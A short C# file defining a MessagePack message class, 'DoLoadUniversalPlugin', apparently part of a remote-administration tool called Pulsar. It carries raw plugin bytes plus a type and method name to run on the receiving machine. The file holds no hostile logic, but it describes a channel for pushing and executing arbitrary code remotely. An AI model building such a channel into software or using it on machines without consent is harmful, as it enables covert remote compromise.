26 lines
506 B
C#
26 lines
506 B
C#
using MessagePack;
|
|
using Pulsar.Common.Messages.Other;
|
|
|
|
namespace Pulsar.Common.Messages
|
|
{
|
|
[MessagePackObject]
|
|
public sealed class DoLoadUniversalPlugin : IMessage
|
|
{
|
|
[Key(1)]
|
|
public string PluginId { get; set; }
|
|
|
|
[Key(2)]
|
|
public byte[] PluginBytes { get; set; }
|
|
|
|
[Key(3)]
|
|
public byte[] InitData { get; set; }
|
|
|
|
[Key(4)]
|
|
public string TypeName { get; set; }
|
|
|
|
[Key(5)]
|
|
public string MethodName { get; set; }
|
|
}
|
|
}
|
|
|